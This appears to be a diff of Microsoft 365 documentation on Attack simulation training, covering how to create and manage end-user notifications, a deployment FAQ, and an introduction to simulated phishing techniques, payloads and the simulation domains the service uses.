- > You can also create end-user notifications during the creation of simulations and simulation automations. For more information, see [Create a simulation: Select end user notifications](attack-simulation-training-simulations.md#select-end-user-notifications) and [Create a simulation automation: Select end user notifications](attack-simulation-training-simulation-automations.md#select-end-user-notifications).
-
-3. On the **Define details** page**, configure the following settings:
- - **Select notification type**: Select one of the following values:
- - **Positive reinforcement notification**
- - **Simulation notification**
- - **Training assignment notification**
- - **Training reminder notification**
- - **Name**: Enter a unique name.
- - **Description**: Enter an optional description.
-
- When you're finished n the **Define details** page, select **Next**.
-
-4. On the **Define content** page, the only setting that's available is **Add content in business language**. When you select it, an **Add content in default language** flyout opens that contains the following settings:
- - **From display name**: Enter the display name of the sender.
- - **From email address**: Enter the email address of the sender.
- - **Select the language of the email**: Select one of the following languages: **Chinese (Simplified)**, **Chinese (Traditional, Taiwan)**, **English**, **French**, **German**, **Italian**, **Japanese**, **Korean**, **Portuguese**, **Russian**, **Spanish**, **Dutch**, **Polish**, **Arabic**, **Finnish**, **Greek**, **Hungarian**, **Indonesian**, **Norwegian Bokmål**, **Romanian**, **Slovak**, **Swedish**, **Thai**, **Turkish**, **Vietnamese**, **Catalan**, **Croatian**, or **Slovenian**.
- - **Mark this as the default language**: Because this is the first and only language for the notification, this language value is selected as the default, and you can't change it.
- - **Subject**: The default that's used depends on the notification type that you selected in the previous step, but you can change it:
- - Positive reinforcement: **Thank you for reporting a phish!**
- - Simulation: **Thank you for participating in a phishing campaign!**
- - Training assignment: **Training assignment notification**
- - Training reminder: **Training reminder notification**
-
- - **Import email**: You can optionally select this button and then select **Choose file** to import an existing plain text message file.
-
- - Email content area: Two tabs are available:
- - **Text** tab: A rich text editor is available to create the notification. To see the typical font and formatting settings, toggle **Formatting controls** to :::image type="icon" source="../../media/scc-toggle-on.png" border="false"::: **On**.
-
- The following controls are also available on the **Text** tab:
-
- - **Dynamic tag**: Select from the following tags based on the notification type:
-
- |Tag name|Tag value|Positive<br/>reinforcement|Simulation|Training<br/>assignment|Training<br/>reminder|
- |||::|::|::|::|
- |**Insert User name**|`${userName}`|Γ£ö|Γ£ö|Γ£ö|Γ£ö|
- |**Insert First name**|`${firstName}`|Γ£ö|Γ£ö|Γ£ö|Γ£ö|
- |**Insert Last name**|`${lastName}`|Γ£ö|Γ£ö|Γ£ö|Γ£ö|
- |**Insert UPN**|`${upn}`|Γ£ö|Γ£ö|Γ£ö|Γ£ö|
- |**Insert Email**|`${emailAddress}`|Γ£ö|Γ£ö|Γ£ö|Γ£ö|
- |**Insert Department**|`${department}`|Γ£ö|Γ£ö|Γ£ö|Γ£ö|
- |**Insert Manager**|`${manager}`|Γ£ö|Γ£ö|Γ£ö|Γ£ö|
- |**Insert Mobile phone**|`${mobilePhone}`|Γ£ö|Γ£ö|Γ£ö|Γ£ö|
- |**Insert City**|`${city}`|Γ£ö|Γ£ö|Γ£ö|Γ£ö|
- |**Insert Date**|`${date|MM/dd/yyyy|offset}`|Γ£ö|Γ£ö|Γ£ö|Γ£ö|
- |**Insert training count**|`${trainingCount}`|||Γ£ö|Γ£ö|
- |**Insert training due date**|`${trainingDueDate}`|||Γ£ö|Γ£ö|
- |**Insert training duration**|`${trainingDuration}`|||Γ£ö|Γ£ö|
- |**Insert training details**|`${trainingDetails}`|||Γ£ö|Γ£ö|
- |**Insert payload**|`${payloadSnapshotEmailContent}`|Γ£ö|Γ£ö|Γ£ö||
-
- - **Use from default**: Select an available template to start with. You can modify the text and layout in the editing area. To reset the notification back to the default text and layout of the template, select **Reset to default**.
-
- - **Code** tab: You can view and modify the HTML code directly.
-
- You can preview the results by selecting **Preview email** at the top of the page.
-
- When you're finished in new end-user notification wizard, select **Save**.
-
- Back on the **Define content** page, the notification is listed on the page. In the **Action** column, you can select :::image type="icon" source="../../media/m365-cc-sc-edit-icon.png" border="false"::: **Edit** or :::image type="icon" source="../../media/m365-cc-sc-eye-icon.png" border="false"::: **Preview** to edit or view the notification.
-
- Select :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Add translation** to create up to 11 more translations of the notification in other languages (12 translations total).
-
- Other than the flyout title changing to **Add translation**, the same options are available as the **Add content in default language** flyout in the first notification you created. Now the **Mark this as default language** check box is available to select. Only one translation of the notification can be the default language.
-
- When two or more translations of the notification are listed on the **Define content** page, the :::image type="icon" source="../../media/m365-cc-sc-delete-icon.png" border="false"::: **Delete** icon is available in the **Actions** column to delete any notification translations that aren't designated as the default language.
-
- When you're finished on the **Define content** page, select **Next**.
-
-5. On the **Review notification** page, you can review the details of your notification.
-
- You can select **Edit** in each section to modify the settings within the section. Or you can select **Back** or the specific page in the wizard.
-
- When you're finished on the **Review notification** page, select **Submit**.
-
-6. On the **New training assignment notification created** page, you can use the links to create a new notification, launch a simulation, or view all notifications.
-
- When you're finished on the **New training assignment notification created** page, select **Done**.
-
-7. Back on the **Tenant notifications** tab in **End user notifications**, the notification that you created is now listed.
-
-## Modify end-user notifications
-
-You can't modify built-in notifications on the **Global notifications** tab. You can only modify custom notifications on the **Tenant notifications** tab.
-
-To modify an existing custom notification on the **Tenant notifications** tab, do one of the following steps:
--- Select the notification from the list by selecting the check box next to the name. Select the :::image type="icon" source="../../media/m365-cc-sc-edit-icon.png" border="false"::: **Edit** action that appears.-- Select **Γï«** (**Actions**) next to the **Notifications** value, and then select :::image type="icon" source="../../media/m365-cc-sc-edit-icon.png" border="false"::: **Edit**.-- Select the notification from the list by clicking anywhere in the row other than the check box. In the details flyout that opens, select **Edit notification** at the bottom of the flyout.-
-The end-user notification wizard opens with the settings and values of the selected notification. The steps are the same as described in the [Create end-user notifications](#create-end-user-notifications) section.
-
-## Copy end-user notifications
-
-To copy an existing notification on the **Tenant notifications** or **Global notifications** tabs, do one of the following steps:
--- Select the notification from the list by clicking the check box, and then select the :::image type="icon" source="../../media/m365-cc-sc-edit-icon.png" border="false"::: **Create a copy** action that appears.-- Select **Γï«** (**Actions**) next to the **Notifications** value, and then select :::image type="icon" source="../../media/m365-cc-sc-edit-icon.png" border="false"::: **Create a copy**.-
-When you copy a custom notification on the **Tenant notifications** tab, a copy of the notification named "\<OriginalName\> - Copy" is added to the list.
-
-When you copy a built-in notification on the **Global notifications** tab, a **Create copy** dialog appears. The dialog confirms that a copy of the notification was created, and is available on the **Tenant notifications** tab. If you select **Go to Tenant notification** you're taken to the **Tenant notifications** tab, where the copied built-in notification is named "\<OriginalName\> - Copy" is available. If you select **Stay here** in the dialog, you return to the **Global notifications** tab.
-
-After the copy is created, you can modify it as [previously described](#modify-end-user-notifications).
-
-> [!TIP]
-> When you're creating or editing a notification, the **Use from default** control on the **Text** tab of the **Add content in default language** step in the end-user notification wizard also allows you to copy the contents of a built-in notification.
-
-## Remove end-user notifications
-
-You can't remove built-in notifications from the **Global notifications** tab. You can only remove custom notifications on the **Tenant notifications** tab. When you delete a notification, all translations of the notification are deleted.
-
-To remove an existing custom notification from the **Tenant notifications** tab, do one of the following steps:
--- Select the notification from the list by clicking the check box next to the name, and then select the :::image type="icon" source="../../media/m365-cc-sc-delete-icon.png" border="false"::: **Delete** action that appears.-- Select **Γï«** (**Actions**) next to the **Notifications** value, and then select :::image type="icon" source="../../media/m365-cc-sc-delete-icon.png" border="false"::: **Delete**.-
-In the confirmation dialog that opens, select **Delete**.
-
-## Related links
-
-[Get started using Attack simulation training](attack-simulation-training-get-started.md)
-
-[Create a phishing attack simulation](attack-simulation-training-simulations.md)
-
-[Simulation automations for Attack simulation training](attack-simulation-training-simulation-automations.md)
security Attack Simulation Training Faq https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/attack-simulation-training-faq.md
- Title: Attack simulation training deployment considerations and FAQ
- - NOCSH
----
- - MET150
- - MOE150
--- m365-security-- tier2-
- - seo-marvel-apr2020
-description: Admins can learn about deployment considerations and frequently asked questions regarding Attack simulation and training in Microsoft 365 E5 or Microsoft Defender for Office 365 Plan 2 organizations.
- Previously updated : 6/22/2023
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 2</a>
--
-# Attack simulation training deployment considerations and FAQ
--
-Attack simulation training enables Microsoft 365 E5 or Microsoft Defender for Office 365 Plan 2 organizations to measure and manage social engineering risk by allowing the creation and management of phishing simulations that are powered by real-world, harmless phishing payloads. Hyper-targeted training, delivered in partnership with Terranova security, helps improve knowledge and change employee behavior.
-
-For more information about getting started with Attack simulation training, see [Get started using Attack simulation training](attack-simulation-training-get-started.md).
-
-While the simulation creation and scheduling experience is designed to be free-flowing and frictionless, simulations at an enterprise scale require planning. This article helps address specific challenges that we see as our customers run simulations in their own environments.
-
-## Issues with end user experiences
-
-### Phishing simulation URLs blocked by Google Safe Browsing
-
-A URL reputation service might identify one or more of the URLs that are used by Attack simulation training as unsafe. Google Safe Browsing in Google Chrome blocks some of the simulated phishing URLs with a **Deceptive site ahead** message. While we work with many URL reputation vendors to always allow our simulation URLs, we don't always have full coverage.
--
-This issue doesn't affect Microsoft Edge.
-
-As part of the planning phase, be sure to check the availability of the URL in your supported web browsers before you use the URL in a phishing campaign. If the URLs are blocked by Google Safe Browsing, [follow this guidance](https://support.google.com/chrome/a/answer/7532419) from Google to allow access to the URLs.
-
-Refer to [Get started using Attack simulation training](attack-simulation-training-get-started.md) for the list of URLs that are currently used by Attack simulation training.
-
-### Phishing simulation and admin URLs blocked by network proxy solutions and filter drivers
-
-Both phishing simulation URLs and admin URLs might be blocked or dropped by your intermediate security devices or filters. For example:
--- Firewalls-- Web Application Firewall (WAF) solutions-- Third-party filter drivers (for example, kernel mode filters)-
-While we have seen few customers being blocked at this layer, it does happen. If you encounter problems, consider configuring the following URLs to bypass scanning by your security devices or filters as required:
--- The simulated phishing URLs as described in [Get started using Attack simulation training](attack-simulation-training-get-started.md).-- <https://security.microsoft.com/attacksimulator>-- <https://security.microsoft.com/attacksimulationreport>-- <https://security.microsoft.com/trainingassignments>-
-### Simulation messages not delivered to all targeted users
-
-It's possible that the number of users who actually receive the simulation email messages is less than the number of users who were targeted by the simulation. The following types of users are excluded as part of target validation:
--- Invalid recipient email addresses.-- Guest users.-- Users that are no longer active in Microsoft Entra ID.-
-If you use distribution groups or mail-enabled security groups to target users, you can use the [Get-DistributionGroupMember](/powershell/module/exchange/get-distributiongroupmember) cmdlet in [Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell) to view and validate distribution group members.
-
-## Issues with Attack simulation training reporting
-
-### Attack simulation training reports don't contain any activity details
-
-Attack simulation training comes with rich, actionable insights that keep you informed of the threat readiness progress of your employees. If Attack simulation training reports aren't populated with data, verify that audit logging is turned on in your organization (it's on by default).
-
-Audit logging is required by Attack simulation training so events can be captured, recorded, and read back. Turning off audit logging has the following consequences for Attack simulation training:
--- Reporting data isn't available across all reports. The reports appear empty.-- Training assignments are blocked, because data isn't available.-
-To verify that audit logging is on or to turn it on, see [Turn auditing on or off](/purview/audit-log-enable-disable).
-
-> [!NOTE]
-> Empty activity details can also be caused by no E5 licenses being assigned to users. Verify at least one E5 license is assigned to an active user to ensure that reporting events are captured and recorded.
-
-### Reporting issues with on-premises mailboxes
-
-Attack simulation training supports on-premises mailboxes, but with reduced reporting functionality:
--- Data on whether users read, forwarded, or deleted the simulation email isn't available for on-premises mailboxes.-- The number of users who reported the simulation email isn't available for on-premises mailboxes.-
-### Simulation reports aren't updated immediately
-
-Detailed simulation reports aren't updated immediately after you launch a campaign. Don't worry; this behavior is expected.
-
-Every simulation campaign has a lifecycle. When first created, the simulation is in the **Scheduled** state. When the simulation starts, it transitions to the **In progress** state. When completed, the simulation transitions to the **Completed** state.
-
-While a simulation is in the **Scheduled** state, the simulation reports are mostly empty. During this stage, the simulation engine is resolving the target user email addresses, expanding distribution groups, removing guest users from the list, etc.:
--
-Once the simulation enters the **In progress** stage, information starts trickling into the reporting:
--
-It can take up to 30 minutes for the individual simulation reports to update after the transition to the **In progress** state. The report data continues to build until the simulation reaches the **Completed** state. Reporting updates occur at the following intervals:
--- Every 10 minutes for the first 60 minutes.-- Every 15 minutes after 60 minutes until two days.-- Every 30 minutes after two days until seven days.-- Every 60 minutes after seven days.-
-Widgets on the **Overview** page provide a quick snapshot of your organization's simulation-based security posture over time. Because these widgets reflect your overall security posture and journey over time, they're updated after each simulation campaign is completed.
-
-> [!NOTE]
-> You can use the **Export** option on the various reporting pages to extract data.
-
-### Messages reported as phishing by users aren't appearing in simulation reports
-
-Simulation reports in Attack simulator training provide details on user activity. For example:
--- Users who clicked on the link in the message.-- Users who gave up their credentials.-- Users who reported the message as phishing.-
-If messages that users reported as phishing aren't captured in Attack simulation training simulation reports, there might be an Exchange mail flow rule (also known as a transport rule) that's blocking the delivery of the reported messages to Microsoft. Verify that any mail flow rules aren't blocking delivery to the following email addresses:
--- junk@office365.microsoft.com-- abuse@messaging.microsoft.com-- phish@office365.microsoft.com-- not\_junk@office365.microsoft.com-
-### Users are assigned training after they report a simulated message
-
-If users are assigned training after they report a phishing simulation message, check to see if your organization uses a reporting mailbox to receive user reported messages at <https://security.microsoft.com/securitysettings/userSubmission>. The reporting mailbox needs to be configured to skip many security checks as described in the [reporting mailbox prerequisites](submissions-user-reported-messages-custom-mailbox.md#configuration-requirements-for-the-reporting-mailbox).
-
-If you don't configure the required exclusions for the custom reporting mailbox, the messages might be detonated by Safe Links or Safe Attachments protection, which causes training assignments.
-
-## Other frequently asked questions
-
-### Q: What is the recommended method to target users for simulation campaigns?
-
-A: Several options are available to target users:
--- Include all users (currently available to organizations with less than 40,000 users).-- Choose specific users.-- Select users from a CSV file (one email address per line).-- Microsoft Entra group-based targeting.-
-We've found that campaigns where the targeted users are identified by Microsoft Entra groups are easier to manage.
-
-### Q: Are there any limits in targeting users while importing from a CSV or adding users?
-
-A: The limit for importing recipients from a CSV file or adding individual recipients to a simulation is 40,000.
-
-A recipient can be an individual user or a group. A group might contain hundreds or thousands of recipients, so an actual limit isn't placed on the number of individual users.
-
-Managing a large CSV file or adding many individual recipients can be cumbersome. Using Microsoft Entra groups simplify the overall management of the simulation.
-
-### Q: Does Microsoft provide payloads in other languages?
-
-A: Currently, there are 40+ localized payloads available in 29+ languages: English, Spanish, German, Japanese, French, Portuguese, Dutch, Italian, Swedish, Chinese (Simplified), Norwegian Bokmål, Polish, Russian, Finnish, Korean, Turkish, Hungarian, Hebrew, Thai, Arabic, Vietnamese, Slovak, Greek, Indonesian, Romanian, Slovenian, Croatian, Catalan, and Other. We've determined that direct or machine translation of existing payloads to other languages leads to inaccuracies and decreased relevance.
-
-That being said, you can create your own payload in the language of your choice using the custom payload authoring experience. We also strongly recommend that you harvest existing payloads that were used to target users in a specific geography. In other words, let the attackers localize the content for you.
-
-### Q: How many training videos are available?
-
-A: Currently, there are more than 85 training modules available in the content library.
-
-### Q: How can I switch to other languages for my admin portal and training experience?
-
-A: In Microsoft 365 or Office 365, language configuration is specific and centralized for each user account. For instructions on how to change your language setting, see [Change your display language and time zone in Microsoft 365 for Business](https://support.microsoft.com/office/6f238bff-5252-441e-b32b-655d5d85d15b).
-
-The configuration change might take up to 30 minutes to synchronize across all services.
-
-### Q: Can I trigger a test simulation to understand what it looks like prior to launching a full-fledged campaign?
-
-A: Yes you can! On the last **Review Simulation** page in the new simulation wizard, select **Send a test**. This option sends a sample phishing simulation message to the currently logged in user. After you validate the phishing message in your Inbox, you can submit the simulation.
--
-### Q: Can I target users that belong to a different tenant as part of the same simulation campaign?
-
-A: No. Currently, cross-tenant simulations aren't supported. Verify that all of your targeted users are in the same tenant. Any cross-tenant users or guest users are excluded from the simulation campaign.
-
-### Q: How does region aware delivery work?
-
-A: Region aware delivery uses the TimeZone attribute of the targeted user's mailbox and 'not before' logic to determine when to deliver the message. For example, consider the following scenario:
--- At 7:00 AM in the Pacific time zone (UTC-8), an admin creates and schedules a campaign to start at 9:00 AM on the same day.-- UserA is in the Eastern time zone (UTC-5).-- UserB is also in the Pacific time zone.-
-At 9:00 AM on the same day, the simulation message is sent to UserB. With region-aware delivery, the message isn't sent to UserA on the same day, because 9:00 AM Pacific time is 12:00 PM Eastern time. Instead, the message is sent to UserA at 9:00 AM Eastern time on the following day.
-
-So, on the initial run of a campaign with region aware delivery enabled, it might appear that the simulation message was sent only to users in a specific time zone. But, as time passes and more users come into scope, the targeted users increase.
-
-### Q: Does Microsoft collect or store any information that users enter at the Credential Harvest sign-in page, used in the Credential Harvest simulation technique?
-
-A: No. Any information entered at the credential harvest sign-in page is discarded silently. Only the 'click' is recorded to capture the compromise event. Microsoft doesn't collect, log or store any details that users enter at this step.
security Attack Simulation Training Get Started https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/attack-simulation-training-get-started.md
- Title: Get started using Attack simulation training
- - NOCSH
----
- - MET150
- - MOE150
-
- - m365-security
- - tier2
-
- - seo-marvel-apr2020
-description: Admins can learn how to use Attack simulation training to run simulated phishing and password attacks in their Microsoft 365 E5 or Microsoft Defender for Office 365 Plan 2 organizations.
- Previously updated : 3/21/2024
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 2</a>
--
-# Get started using Attack simulation training
--
-In organizations with Microsoft Defender for Office 365 Plan 2 (add-on licenses or included in subscriptions like Microsoft 365 E5), you can use Attack simulation training in the Microsoft Defender portal to run realistic attack scenarios in your organization. These simulated attacks can help you identify and find vulnerable users before a real attack impacts your bottom line.
-
-This article explains the basics of Attack simulation training.
-
-Watch this short video to learn more about Attack simulation training.
-> [!VIDEO https://www.microsoft.com/en-us/videoplayer/embed/RWMhvB]
-
-> [!NOTE]
-> Attack simulation training replaces the old Attack Simulator v1 experience that was available in the Security & Compliance Center at **Threat management** \> **Attack simulator** or <https://protection.office.com/attacksimulator>.
-
-## What do you need to know before you begin?
--- Attack simulation training requires a Microsoft 365 E5 or [Microsoft Defender for Office 365 Plan 2](mdo-about.md#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet) license. For more information about licensing requirements, see [Licensing terms](/office365/servicedescriptions/office-365-advanced-threat-protection-service-description#licensing-terms).--- Attack simulation training supports on-premises mailboxes, but with reduced reporting functionality. For more information, see [Reporting issues with on-premises mailboxes](attack-simulation-training-faq.md#reporting-issues-with-on-premises-mailboxes).--- To open the Microsoft Defender portal, go to <https://security.microsoft.com>. Attack simulation training is available at **Email and collaboration** \> **Attack simulation training**. To go directly to Attack simulation training, use <https://security.microsoft.com/attacksimulator>.--- For more information about the availability of Attack simulation training across different Microsoft 365 subscriptions, see [Microsoft Defender for Office 365 service description](/office365/servicedescriptions/office-365-advanced-threat-protection-service-description).--- You need to be assigned permissions before you can do the procedures in this article. You have the following options:
- - [Microsoft Entra permissions](/entra/identity/role-based-access-control/manage-roles-portal): You need membership in one of the following roles:
- - **Global Administrator**
- - **Security Administrator**
- - **Attack Simulation Administrators**<sup>\*</sup>: Create and manage all aspects of attack simulation campaigns.
- - **Attack Payload Author**<sup>\*</sup>: Create attack payloads that an admin can initiate later.
-
- <sup>\*</sup> Adding users to this role group in [Email & collaboration permissions in the Microsoft Defender portal](mdo-portal-permissions.md) is currently unsupported.
-
- Currently, [Microsoft Defender XDR Unified role based access control (RBAC)](/microsoft-365/security/defender/manage-rbac) isn't supported.
--- There are no corresponding PowerShell cmdlets for Attack simulation training.--- Attack simulation and training related data is stored with other customer data for Microsoft 365 services. For more information, see [Microsoft 365 data locations](/microsoft-365/enterprise/o365-data-locations). Attack simulation training is available in the following regions: APC, EUR, and NAM. Countries within these regions where Attack simulation training is available include ARE, AUS, BRA, CAN, CHE, DEU, FRA, GBR, IND, JPN, KOR, LAM, NOR, POL, QAT, SGP, SWE, and ZAF.-
- > [!NOTE]
- > NOR, ZAF, ARE and DEU are the latest additions. All features except reported email telemetry are available in these regions. We're working to enable the features and we'll notify customers as soon as reported email telemetry becomes available.
--- As of September 2023, Attack simulation training is available in Microsoft 365 GCC and GCC High environments, but certain advanced features aren't available in GCC High (for example, payload automation, recommended payloads, the predicted compromised rate). If your organization has Office 365 G5 GCC or Microsoft Defender for Office 365 (Plan 2) for Government, you can use Attack simulation training as described in this article. Attack simulation training isn't yet available in DoD environments.-
-> [!NOTE]
-> Attack simulation training offers a subset of capabilities to E3 customers as a trial. The trial offering contains the ability to use a Credential Harvest payload and the ability to select 'ISA Phishing' or 'Mass Market Phishing' training experiences. No other capabilities are part of the E3 trial offering.
-
-## Simulations
-
-A simulation in Attack simulation training is the overall campaign that delivers realistic but harmless phishing messages to users. The basic elements of a simulation are:
--- Who gets the simulated phishing message and on what schedule.-- Training that users get based on their action or lack of action (for both correct and incorrect actions) on the simulated phishing message.-- The _payload_ that's used in the simulated phishing message (a link or an attachment), and the composition of the phishing message (for example, package delivered, problem with your account, or you won a prize).-- The _social engineering technique_ that's used. The payload and social engineering technique are closely related.-
-In Attack simulation training, multiple types of social engineering techniques are available. Except for **How-to Guide**, these techniques were curated from the [MITRE ATT&CK® framework](https://attack.mitre.org/techniques/enterprise/). Different payloads are available for different techniques.
-
-The following social engineering techniques are available:
--- **Credential Harvest**: An attacker sends the recipient a message that contains a URL. When the recipient clicks on the URL, they're taken to a website that typically shows a dialog box that asks the user for their username and password. Typically, the destination page is themed to represent a well-known website in order to build trust in the user.--- **Malware Attachment**: An attacker sends the recipient a message that contains an attachment. When the recipient opens the attachment, arbitrary code (for example, a macro) is run on the user's device to help the attacker install additional code or further entrench themselves.--- **Link in Attachment**: This technique is a hybrid of a credential harvest. An attacker sends the recipient a message that contains a URL inside of an attachment. When the recipient opens the attachment and clicks on the URL, they're taken to a website that typically shows a dialog box that asks the user for their username and password. Typically, the destination page is themed to represent a well-known website in order to build trust in the user.--- **Link to Malware**: An attacker sends the recipient a message that contains a link to an attachment on a well-known file sharing site (for example, SharePoint Online or Dropbox). When the recipient clicks on the URL, the attachment opens, and arbitrary code (for example, a macro) is run on the user's device to help the attacker install additional code or further entrench themselves.--- **Drive-by-url**: An attacker sends the recipient a message that contains a URL. When the recipient clicks on the URL, they're taken to a website that tries to run background code. This background code attempts to gather information about the recipient or deploy arbitrary code on their device. Typically, the destination website is a well-known website that has been compromised or a clone of a well-known website. Familiarity with the website helps convince the user that the link is safe to click. This technique is also known as a _watering hole attack_.--- **OAuth Consent Grant**: An attacker creates a malicious Azure Application that seeks to gain access to data. The application sends an email request that contains a URL. When the recipient clicks on the URL, the consent grant mechanism of the application asks for access to the data (for example, the user's Inbox).--- **How-to Guide**: A teaching guide that contains instructions for users (for example, how to report phishing messages).-
-The URLs that are used by Attack simulation training are listed in the following table:
-
-|&nbsp;|&nbsp;|&nbsp;|
-||||
-|<https://www.attemplate.com>|<https://www.exportants.it>|<https://www.resetts.it>|
-|<https://www.bankmenia.com>|<https://www.exportants.org>|<https://www.resetts.org>|
-|<https://www.bankmenia.de>|<https://www.financerta.com>|<https://www.salarytoolint.com>|
-|<https://www.bankmenia.es>|<https://www.financerta.de>|<https://www.salarytoolint.net>|
-|<https://www.bankmenia.fr>|<https://www.financerta.es>|<https://www.securembly.com>|
-|<https://www.bankmenia.it>|<https://www.financerta.fr>|<https://www.securembly.de>|
-|<https://www.bankmenia.org>|<https://www.financerta.it>|<https://www.securembly.es>|
-|<https://www.banknown.de>|<https://www.financerta.org>|<https://www.securembly.fr>|
-|<https://www.banknown.es>|<https://www.financerts.com>|<https://www.securembly.it>|
-|<https://www.banknown.fr>|<https://www.financerts.de>|<https://www.securembly.org>|
-|<https://www.banknown.it>|<https://www.financerts.es>|<https://www.securetta.de>|
-|<https://www.banknown.org>|<https://www.financerts.fr>|<https://www.securetta.es>|
-|<https://www.browsersch.com>|<https://www.financerts.it>|<https://www.securetta.fr>|
-|<https://www.browsersch.de>|<https://www.financerts.org>|<https://www.securetta.it>|
-|<https://www.browsersch.es>|<https://www.hardwarecheck.net>|<https://www.shareholds.com>|
-|<https://www.browsersch.fr>|<https://www.hrsupportint.com>|<https://www.sharepointen.com>|
-|<https://www.browsersch.it>|<https://www.mcsharepoint.com>|<https://www.sharepointin.com>|
-|<https://www.browsersch.org>|<https://www.mesharepoint.com>|<https://www.sharepointle.com>|
-|<https://www.docdeliveryapp.com>|<https://www.officence.com>|<https://www.sharesbyte.com>|
-|<https://www.docdeliveryapp.net>|<https://www.officenced.com>|<https://www.sharession.com>|
-|<https://www.docstoreinternal.com>|<https://www.officences.com>|<https://www.sharestion.com>|
-|<https://www.docstoreinternal.net>|<https://www.officentry.com>|<https://www.supportin.de>|
-|<https://www.doctorican.de>|<https://www.officested.com>|<https://www.supportin.es>|
-|<https://www.doctorican.es>|<https://www.passwordle.de>|<https://www.supportin.fr>|
-|<https://www.doctorican.fr>|<https://www.passwordle.fr>|<https://www.supportin.it>|
-|<https://www.doctorican.it>|<https://www.passwordle.it>|<https://www.supportres.de>|
-|<https://www.doctorican.org>|<https://www.passwordle.org>|<https://www.supportres.es>|
-|<https://www.doctrical.com>|<https://www.payrolltooling.com>|<https://www.supportres.fr>|
-|<https://www.doctrical.de>|<https://www.payrolltooling.net>|<https://www.supportres.it>|
-|<https://www.doctrical.es>|<https://www.prizeably.com>|<https://www.supportres.org>|
-|<https://www.doctrical.fr>|<https://www.prizeably.de>|<https://www.techidal.com>|
-|<https://www.doctrical.it>|<https://www.prizeably.es>|<https://www.techidal.de>|
-|<https://www.doctrical.org>|<https://www.prizeably.fr>|<https://www.techidal.fr>|
-|<https://www.doctricant.com>|<https://www.prizeably.it>|<https://www.techidal.it>|
-|<https://www.doctrings.com>|<https://www.prizeably.org>|<https://www.techniel.de>|
-|<https://www.doctrings.de>|<https://www.prizegiveaway.net>|<https://www.techniel.es>|
-|<https://www.doctrings.es>|<https://www.prizegives.com>|<https://www.techniel.fr>|
-|<https://www.doctrings.fr>|<https://www.prizemons.com>|<https://www.techniel.it>|
-|<https://www.doctrings.it>|<https://www.prizesforall.com>|<https://www.templateau.com>|
-|<https://www.doctrings.org>|<https://www.prizewel.com>|<https://www.templatent.com>|
-|<https://www.exportants.com>|<https://www.prizewings.com>|<https://www.templatern.com>|
-|<https://www.exportants.de>|<https://www.resetts.de>|<https://www.windocyte.com>|
-|<https://www.exportants.es>|<https://www.resetts.es>||
-|<https://www.exportants.fr>|<https://www.resetts.fr>||
-
-> [!NOTE]
-> Check the availability of the simulated phishing URL in your supported web browsers before you use the URL in a phishing campaign. For more information, see [Phishing simulation URLs blocked by Google Safe Browsing](attack-simulation-training-faq.md#phishing-simulation-urls-blocked-by-google-safe-browsing).
-
-### Create simulations
-
-For instructions on how to create and launch simulations, see [Simulate a phishing attack](attack-simulation-training-simulations.md).
-
-The _landing page_ in the simulation is where users go when they open the payload. When you create a simulation, you select the landing page to use. You can select from built-in landing pages, custom landing pages that you already created, or you can create a new landing page to use during the creation of the simulation. To create landing pages, see [Landing pages in Attack simulation training](attack-simulation-training-landing-pages.md).
-
-_End user notifications_ in the simulation send periodic reminders to users (for example, training assignment and reminder notifications). You can select from built-in notifications, custom notifications that you already created, or you can create new notifications to use during the creation of the simulation. To create notifications, see [End-user notifications for Attack simulation training](attack-simulation-training-end-user-notifications.md).
-
-> [!TIP]
-> _Simulation automations_ provide the following improvements over traditional simulations:
->
-> - Simulation automations can include multiple social engineering techniques and related payloads (simulations contain only one).
-> - Simulation automations support automated scheduling options (more than just the start date and end date in simulations).
->
-> For more information, see [Simulation automations for Attack simulation training](attack-simulation-training-simulation-automations.md).
-
-### Payloads
-
-Although Attack simulation contains many built-in payloads for the available social engineering techniques, you can create custom payloads to better suit your business needs, including [copying and customizing an existing payload](attack-simulation-training-payloads.md#copy-payloads). You can create payloads at any time before you create the simulation or during the creation of the simulation. To create payloads, see [Create a custom payload for Attack simulation training](attack-simulation-training-payloads.md#create-payloads).
-
-In simulations that use **Credential Harvest** or **Link in Attachment** social engineering techniques, _login pages_ are part of the payload that you select. The login page is the web page where users enter their credentials. Each applicable payload uses a default login page, but you can change the login page that's used. You can select from built-in login pages, custom login pages that you already created, or you can create a new login page to use during the creation of the simulation or the payload. To create login pages, see [Login pages in Attack simulation training](attack-simulation-training-login-pages.md).
-
-The best training experience for simulated phishing messages is to make them as close as possible to real phishing attacks that your organization might experience. What if you could capture and use harmless versions of real-world phishing messages that were detected in Microsoft 365 and use them in simulated phishing campaigns? You can, with _payload automations_ (also known as _payload harvesting_). To create payload automations, see [Payload automations for Attack simulation training](attack-simulation-training-payload-automations.md).
-
-### Reports and insights
-
-After you create and launch the simulation, you need to see how it's going. For example:
--- Did everyone receive it?-- Who did what to the simulated phishing message and the payload within it (delete, report, open the payload, enter credentials, etc.).-- Who completed the assigned training.-
-The available reports and insights for Attack simulation training are described in [Insights and reports for Attack simulation training](attack-simulation-training-insights.md).
-
-### Predicted compromise rate
-
-You often need to tailor a simulated phishing campaign for specific audiences. If the phishing message is too close to perfect, almost everyone will be fooled by it. If it's too suspicious, no will be fooled by it. And, the phishing messages that some users consider difficult to identify are considered easy to identify by other users. So how do you strike a balance?
-
-The _predicted compromise rate (PCR)_ indicates the potential effectiveness when the payload is used in a simulation. PCR uses intelligent historical data across Microsoft 365 to predict the percentage of people who will be compromised by the payload. For example:
--- Payload content.-- Aggregated and anonymized compromise rates from other simulations.-- Payload metadata.-
-PCR allows you to compare the predicted vs. actual click through rates for your phishing simulations. You can also use this data to see how your organization performs compared to predicted outcomes.
-
-PCR information for a payload is available wherever you view and select payloads, and in the following reports and insights:
